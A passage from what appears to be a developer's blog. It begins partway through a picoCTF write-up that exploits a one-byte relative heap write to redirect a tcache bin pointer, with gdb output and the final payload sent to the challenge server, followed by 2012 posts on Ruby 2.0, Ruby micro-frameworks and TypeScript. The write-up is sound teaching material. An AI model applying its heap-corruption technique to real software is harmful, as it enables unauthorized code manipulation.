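    @chunks.push(addr)
  end

  def malloc
    @chunks.pop
  end
end

bin = TcacheBin.new
bin.free(0x603800)  # flag_data chunk freed first
bin.free(0x603890)  # random_data chunk freed second
bin.malloc          # => 0x603890, the last chunk freed comes back first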
If you do not have access to gef, the address can also be found via gdb. Let's take a look at the relevant disassembly.
0x00000000004009a8 <+417>: mov rax,QWORD PTR [rbp-0x80]
0x00000000004009ac <+421>: mov rdi,rax
0x00000000004009af <+424>: call 0x400680 <free@plt>
The address of the last freed chunk is stored at rbp-0x80, so we can also get the address of the heap chunk via rbp-0x80.
gef➤ p *((void**)($rbp-0x80))
$8 = (void *) 0x603890
The Exploit
Now that we… umm… “understand” the tcache, we can finally talk about the exploit. The goal is for the malloc at the end to recycle the flag_data chunk instead of the random_data chunk. What we now know:
- We have to rewrite the tcache bin pointer to point to flag_data instead of random_data.
- We can overwrite one byte, relative to another pointer in the heap, via first_malloc_data[address] = new_byte.
- The chunk addresses of flag_data and random_data (0x603800 and 0x603890) differ in exactly one byte.
Everything seems to line up quite well! Like someone planned this…
I will first exploit the binary locally with gdb, to ensure we really understand the challenge and can verify that it actually works. Afterwards I will generalize the exploit to make it runnable remotely.
Dry Run
First, we need to know the location of the tcache bin ptr (I will try to be consistent in using tcache bin pointer to denote where the tcache bin pointer is pointing and tcache bin ptr to denote the location in memory of the tcache bin ptr itself). Logic dictates that the tcache bin ptr has to be somewhere in memory; otherwise the allocator would not know where to insert the next element on a free, or where to take a chunk from when malloc is called. It is also safe to assume that the pointer has to be somewhere in the heap, as the allocator cannot rely on the stack for its pointers. Let's search for it!
We continue with the gdb session started above, where the debugger is still waiting after the second free. First we need to know where the [heap]
is in our process memory.
gef➤ info proc mappings
process 1343
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x400000 0x401000 0x1000 0x0 /home/picoctf/cache-me-outside/heapedit
0x600000 0x601000 0x1000 0x0 /home/picoctf/cache-me-outside/heapedit
0x601000 0x602000 0x1000 0x1000 /home/picoctf/cache-me-outside/heapedit
0x602000 0x623000 0x21000 0x0 [heap]
0x7ffff79e4000 0x7ffff7bcb000 0x1e7000 0x0 /home/picoctf/cache-me-outside/libc.so.6
0x7ffff7bcb000 0x7ffff7dcb000 0x200000 0x1e7000 /home/picoctf/cache-me-outside/libc.so.6
0x7ffff7dcb000 0x7ffff7dcf000 0x4000 0x1e7000 /home/picoctf/cache-me-outside/libc.so.6
0x7ffff7dcf000 0x7ffff7dd1000 0x2000 0x1eb000 /home/picoctf/cache-me-outside/libc.so.6
0x7ffff7dd1000 0x7ffff7dd5000 0x4000 0x0
0x7ffff7dd5000 0x7ffff7dfc000 0x27000 0x0 /home/picoctf/cache-me-outside/ld-2.27.so
0x7ffff7ff4000 0x7ffff7ff6000 0x2000 0x0
0x7ffff7ff6000 0x7ffff7ffa000 0x4000 0x0 [vvar]
0x7ffff7ffa000 0x7ffff7ffc000 0x2000 0x0 [vdso]
0x7ffff7ffc000 0x7ffff7ffd000 0x1000 0x27000 /home/picoctf/cache-me-outside/ld-2.27.so
0x7ffff7ffd000 0x7ffff7ffe000 0x1000 0x28000 /home/picoctf/cache-me-outside/ld-2.27.so
0x7ffff7ffe000 0x7ffff7fff000 0x1000 0x0
0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]
The heap lives between 0x602000 and 0x623000. As seen above, the last chunk inserted into the tcache is at 0x603890. If the tcache bin ptr lives in the heap, we should find the value 0x603890 somewhere between 0x602000 and 0x623000. With gdb, we can search for it.
gef➤ find 0x602000, 0x623000, 0x603890
0x602088
warning: Unable to access 7029 bytes of target memory at 0x62148c, halting search.
1 pattern found.
The tcache bin ptr is stored in the heap at 0x602088. We can also verify this.
gef➤ x/x 0x602088
0x602088: 0x0000000000603890
To make our exploit work, we need to change the tcache bin ptr (at 0x602088) from pointing to the random_data chunk (at 0x603890) to pointing to the flag_data chunk (at 0x603800). Luckily, this means changing a single byte from 0x90 to 0x00.
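As a quick sanity check, clearing only the lowest byte of the random_data address does indeed yield the flag_data address. A minimal sketch of the arithmetic:

```ruby
random_data = 0x603890
flag_data   = 0x603800

# Replace only the least significant byte with 0x00.
patched = (random_data & ~0xff) | 0x00

patched == flag_data  # => true
```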
Let’s first validate our understanding manually and change the address via gdb.
gef➤ set {void*}0x602088 = 0x0000000000603800
gef➤ x 0x602088
0x602088: 0x0000000000603800
gef➤ heap bins tcache
──────── Tcachebins for arena 0x7ffff7dcfc40 ────────
Tcachebins[idx=7, size=0x90] count=2 ← Chunk(addr=0x603800, size=0x90, flags=PREV_INUSE)
We first update the pointer with set, spot-check that the value is really overwritten, and then check the new layout of the tcache with heap bins tcache. As we can see, we now only have one value in it. asideEagle-eyed folks might notice the count=2. The metadata is now screwed up, but the program only makes one more malloc, so it does not matter here. When running the program now, it outputs the flag, independent of what inputs we give it.
gef➤ c
Continuing.
You may edit one byte in the program.
Address: AAAA
Value: lag is: iamaflag
Perfect! We validated our approach. Next up, we need to be able to execute this from the command line without gdb.
Generalize Exploit
Now that we know that we can overwrite a single byte to get the flag, we need to figure out how to overwrite that byte with just the inputs to the program (address and new byte). Let’s first have a look at the relevant code again.
address = 0;
new_byte = '\0';
puts("You may edit one byte in the program.");
printf("Address: ");
__isoc99_scanf("%d",&address); // (10)
printf("Value: ");
__isoc99_scanf(" %c",&new_byte); // (11)
first_malloc_data[address] = new_byte;
last_malloc = (char **)malloc(0x80);
puts((char *)(last_malloc + 2)); // (12)
We give it an address (from now on, I will call it an offset, as it is not an address, it is an offset!) and a new byte. It will then write the new byte to first_malloc_data[address].
This is very convenient for us. Normally, in a heap exploit, we would need a leak of a heap address, as the heap will not always be placed at the same address. Is it hopeless? Of course not! While the absolute addresses (and the position of the heap) are random, the positions of chunks inside the heap are stable. If a chunk is 0x1337 bytes away from another address in the heap, it will always be 0x1337 bytes away from that address, in each and every run. If we can leak an address in the heap (a heap address leak), we can simply calculate the offset locally, and that offset will be correct no matter where the program is run. Here, first_malloc_data acts as a free heap address leak.
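To illustrate why a relative offset sidesteps the randomized heap placement, here is a sketch with two heap base addresses (the offsets 0x88 and 0x14a0 match the addresses found in this binary; the second base address is made up):

```ruby
# Under ASLR the heap base changes per run, but the distances
# between objects inside the heap do not.
offsets = [0x602000, 0x55e4c2a00000].map do |heap_base|
  tcache_bin_ptr    = heap_base + 0x88    # offset of the tcache bin ptr
  first_malloc_data = heap_base + 0x14a0  # offset of first_malloc_data
  tcache_bin_ptr - first_malloc_data
end

offsets  # => [-5144, -5144]: the same offset in every run
```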
The heap looks something like this:
┌──────────────────┐
│ start of heap │
├──────────────────┤
│ ... │
├──────────────────┤
│ tcache bin ptr │
├──────────────────┤ ▲
│ │ │
│ ... │ │offset
│ │ │
├──────────────────┤ ▼
│first_malloc_data │
├──────────────────┤
│ │
│ │
│ ... │
│ │
│ │
│ │
│ │
├──────────────────┤
│ end of heap │
└──────────────────┘
To write the byte to the correct location in the heap, we need to know the offset between first_malloc_data and the tcache bin ptr, so we can use that as the address input to the program. We know where the tcache bin ptr is stored (0x602088), but we also need the address of first_malloc_data. According to the disassembly (either in ghidra or gdb) it is stored in rbp-0x98 (for example visible in the gdb disassembly at main+212). Getting the address with gdb:
gef➤ p *((void**)($rbp-0x98))
$10 = (void *) 0x6034a0
Now we can calculate the offset between the two.
gef➤ p/d 0x602088-0x6034a0
$12 = -5144
So we subtract 5144 from the address of first_malloc_data to get the address of the tcache bin ptr. To change the pointer from 0x603890 to 0x603800, we need to overwrite its last byte. As we are running on x64, which is little-endian, this is the first byte at that address (the value 0x603890 is stored as the byte sequence 90 38 60 00 00 00 00 00). The inputs to the program should result in first_malloc_data[-5144] = 0x00: -5144 for the address and 0x00 for the new byte.
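The offset computation and the two scanf inputs can be written down as a small sketch:

```ruby
tcache_bin_ptr    = 0x602088  # location of the tcache bin ptr in this run
first_malloc_data = 0x6034a0  # base address of the relative write

offset = tcache_bin_ptr - first_malloc_data  # => -5144

# The first scanf reads the offset as a decimal number ("%d"),
# the second reads a single byte (" %c"); here a NUL byte.
payload = "#{offset}\n\x00\n"
```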
$ echo "-5144\n\x00\n\n" | ./heapedit
You may edit one byte in the program.
Address: Value: lag is: iamaflag
And we get the flag!
We can run the same thing remotely as well.
$ echo "-5144\n\x00\n\n" | nc mercury.picoctf.net 31153
You may edit one byte in the program.
Address: Value: lag is: picoCTF{...}
29 Oct 2012
Yes, you read that right:
Ruby 2.0 is in feature freeze! This doesn't mean it will be released in the next month, but it shows us the most important changes that will come with version 2.0.
The timing is actually pretty impressive, since this feature freeze was announced by Yusuke Endoh one year ago! Ruby seems to be on track (pun totally intended)! Want more details? Read on!
The Release Plan
Right now, there are two important milestones left: code freeze and release. Code freeze is planned for the end of the year, so all the bugs should be more or less ironed out by then.
And then, on February 24, 2013, 20 years after Ruby became part of this world, Ruby 2.0 should be released!
The New Features
There isn't an official list with all the new features out yet, but the source code, commit history and discussions are open to the public, so it is no secret!
This isn't as big a release as the jump from 1.9 to 2.0 would suggest; there are only a handful of new features:
Refinements
Refinements are one of the more interesting changes that could actually change the way Ruby code is written.
It allows you to monkey patch a class, but only where you want to, and not in the global scope.
Monkey patching could actually become an accepted thing to do!
Some code? Sure:
module StringExt
  refine String do
    def length
      42
    end
  end
end
Here we define a module that contains a refinement (refine) for String, because length should always be 42 (for whatever reason...). Let's define a class that could use it:
class TheAnswerToLifeTheUniverseAndEverything
def self.answer(the_question)
the_question.length
end
end
But that is wrong! And that's right. No, wait, I mean, the answer is wrong, but the rest is right. That's because we didn't use the refinement yet, we just defined it.
Let's use it then:
class TheAnswerToLifeTheUniverseAndEverything
using StringExt
def self.answer(the_question)
the_question.length
end
end
If we ask for TheAnswerToLifeTheUniverseAndEverything.answer("I want the answer to everything!!! NOOOOOW") it will tell us 42. Exactly what we want. But the behavior of String#length outside of our class hasn't changed. At all! Only when we use it inside a class that is using this refinement is the behavior changed.
Which could be really handy!
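The lexical scoping can be demonstrated directly. A runnable sketch in modern Ruby, where using is also allowed inside a class body (in Ruby 2.0 it was still restricted to the top level):

```ruby
module StringExt
  refine String do
    def length
      42
    end
  end
end

class Refined
  using StringExt

  def self.answer(question)
    question.length  # refined here: always 42
  end
end

Refined.answer("anything")  # => 42
"anything".length           # => 8, unchanged outside the refined scope
```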
Named Arguments
Another one that we might end up seeing a lot is named arguments. Named arguments could replace the options hash that is so prevalent in today's Ruby code. Use
def namedParameters?(yes: true, no: false) [...] end.
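A sketch of what that looks like in practice (method name and defaults are made up for illustration):

```ruby
# Keyword arguments with defaults, replacing an options hash.
def greet(name, greeting: "Hello", punctuation: "!")
  "#{greeting}, #{name}#{punctuation}"
end

greet("world")                    # => "Hello, world!"
greet("world", greeting: "Howdy") # => "Howdy, world!"
```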
Then there are some internal changes and some speed improvements for MRI. Nothing exciting, but definitely good changes.
Will It Break Stuff?
Most likely? No. The most likely candidate to break stuff? respond_to?.
The behavior of respond_to? in regards to protected methods has changed. By default, in 2.0, it doesn't search for private or protected methods; in Ruby 1.9 it only excludes private methods.
The amazing Tenderlove has a great writeup about this.
Apart from that, it seems like there is nothing else that will break with Ruby 2.0, so the upgrade should be easier than going from 1.8 to 1.9.
Even though the roadmap is actually pretty big!
Yay! Exciting Stuff!
I'm looking forward to Ruby 2.0. I'm especially interested in what kind of clever hacks people will come up with now that we have refinements.
What are you looking forward to? What is still missing in your opinion?
If you liked this post, you should consider hiring me freelance, part-time or full-time!
13 Oct 2012
To answer the question directly (aka a TLDR here for the impatient): I don't know. Read on! (HA! Tricked you there!)
Let's take a dive through some Ruby web frameworks. There are one or two around, even if we don't count Rails. I promise!
But First, Let's Take The Rails
You know, I'm from Switzerland. We love the Railway here. We take it everywhere. It's our go-to solution. Why? It offers everything we need, it is on time, and we can precisely plan when we will be at the destination.
Like Rails! It is the go-to solution, exactly because it offers so much stuff. Want migrations? It's right there! Want an asset pipeline? It's right there! Want to use SASS? It's right there! Architecture? Done. Validations? Done. ORM? Done. Security? Done.
This is really nice! And we know that it might not be the quickest way to get somewhere, but it will surely get us there in a hell of a good time, and we can still continue from there. There are no dead ends!
If you are American, I'm sorry. I know you probably don't get why calling Rails after the Railway is a good and apt metaphor. So come visit Switzerland, get a good local beer with me and I will show you why!
Onwards, To Cuba!
Cuba! Where you can really do whatever you want. Welcome to the island of simpler times. The island where everything still seems easy.
Cuba doesn't have too many complicated processes. Everything can be done, as long as you do it yourself.
Welcome to Cuba, the Ruby microframework. Using Cuba is real easy:
require "cuba"
Cuba.use Rack::Session::Cookie
Cuba.define do
on get do
on "hello" do
res.write "Hello world!"
end
on root do
res.redirect "/hello"
end
end
end
Yes, that's it! Inspired by Sinatra? Maybe. It offers a few other things, like security or template handling through Tilt.
A very simple and laid-back framework. Very fitting for Cuba.
Lets Go Camping
But of course, now that we are in Cuba, let's go camping! This way, we can see the landscape. We can see the world like it really is, unfiltered. And it is healthy, too!
Don't know how to set up your tent? No problem, maybe the Camping framework can help:
Camping.goes :Tent
module Tent::Models
class Tarpaulin < Base; end
end
module Tent::Controllers
class Index
def get
@tarpaulins = Tarpaulin.all
render :index
end
end
end
module Tent::Views
def index
@tarpaulins.each do |tarpaulin|
h1 tarpaulin.size
div { tarpaulin.color }
end
end
end
Yep, that's it. Very Rails inspired, isn't it? But it makes sense, because going camping by train makes a lot more sense! And yes, it is all in one file. Including MVC, including routes, including everything!
But will it replace Rails? I don't think so.
All That Traveling Gives Me A Cramp
Already? A cramp? We just traveled a bit around Cuba and you already have a cramp? I guess it was time to get you out of your comfort zone!
Ah, that damn cramp. This is something special. But lucky for us, we don't have to wait until your cramp recedes, we can just continue. Nice, isn't it?
Don't know why we can continue even while you have a Cramp? See for yourself:
require 'cramp'
class GoHomeAction < Cramp::Action
def start
render "Let's Go Home"
finish
end
end
Yup, that's it. The cool thing about Cramp? It is designed for asynchronous requests right out of the box. It is very simple, but powerful, if used the right way.
But, since walking around with a cramp isn't fun, maybe it's time that we head home.
Home Sweet Home
Welcome back! I hope you enjoyed this tour around the (Ruby) world. I know I did! So to answer the question that the title was asking all along: Probably not, since all these other frameworks target another niche.
Will something replace Rails? I don't know. Rails has a lot of convenience built in that is just a burden to lose. And I don't think we will see a new full-featured web framework soon. But these micro frameworks are really nice for the small niche that they chose to fill.
So for very small apps, maybe Rails isn't the right choice. For bigger ones? I still think the convenience of Rails can't be topped by these small frameworks.
If you liked this post, you should consider hiring me freelance, part-time or full-time!
08 Oct 2012
Interesting. Microsoft recently released their own version of JavaScript, TypeScript! Now, some people might want to mock Microsoft for that. Maybe they just couldn't make Visual Studio play nice with JavaScript, so they made TypeScript. Oh wait!
I am one of those people!
Naah, let's be serious here. TypeScript is something like CoffeeScript. It does less and more. It offers "proper" type support and a class system. They don't touch any syntax however.
At first I simply wanted to introduce TypeScript, but it turned out in fact I just wanted to rant about how wrong Microsoft is once again in trying to introduce their own standards.
An Example, Please!
Sure, judge for yourself:
class Greeter {
greeting: string;
constructor (message: string) {
this.greeting = message;
}
greet() {
return "Hello, " + this.greeting;
}
}
var greeter = new Greeter("world");
var button = document.createElement('button')
button.innerText = "Say Hello"
button.onclick = function() {
alert(greeter.greet())
}
document.body.appendChild(button)
(Taken straight from their documentation)
So this is basically JavaScript syntax. All braces are kept intact, except it introduces classes and types that will be checked during compilation.
So, Why?
Apparently, some people working for Microsoft had problems with JavaScript. Which is fair, since I guess we all have problems with JavaScript sometimes. Microsoft's solution? Make our own JavaScript!
Because, let's be honest, this worked so well with a lot of stuff they did, like, oh, ActiveX... or OOXML.
Why Does Microsoft Need Its Own Stuff Again?
I honestly have no idea. No idea whatsoever! It doesn't make any sense. We have CoffeeScript. If they wanted to back a JavaScript replacement with types, why not back Google's Dart? It would make a lot more sense.
But no, Microsoft had to introduce its own stuff again. Why will remain a mystery, probably forever.
Will This Succeed?
Probably. Why? Simply because in Microsoft world, people love Microsoft stuff. Nothing wrong with that, it is convenient. And if Microsoft backs something, this means people will probably pick it up.
The integration into Visual Studio, the IDE of choice for Microsoft programmers, will probably have superb support for TypeScript, including refactoring and all the other goodies that people expect from IDEs these days.
So yes, I think a few people will pick it up, just because it is bundled. The same way that a lot of Rubyists picked up SASS, or CoffeeScript, simply because it comes bundled with Rails. And yes, I know, not every Rubyist uses Rails, sorry 'bout that!
You Don't Like It, Right?
Well, no. It doesn't offer enough new stuff that we could consider this a new awesome thing that could change the landscape of web programming. In fact, I don't think it offers anything new.
So no, I don't like it. I don't like it when companies waste good, sparse programming talent. Why couldn't Microsoft back Dart? Then that language would suddenly be huge! If Chrome and Internet Explorer come with proper Dart support, Mozilla would have no choice but to back it too!
But no, this way we, again, have multiple "standards" that aren't interoperable. We will have another fight on our hands with Google pushing for Dart, Microsoft for TypeScript, and Mozilla (maybe) for CoffeeScript.
Does this remind anyone else of web codecs?
No, no, and no. I do not agree with that decision by Microsoft. I think it's wrong, bad, and it definitely won't help move the web forward. In fact, it pushes it backwards.
So sorry. No.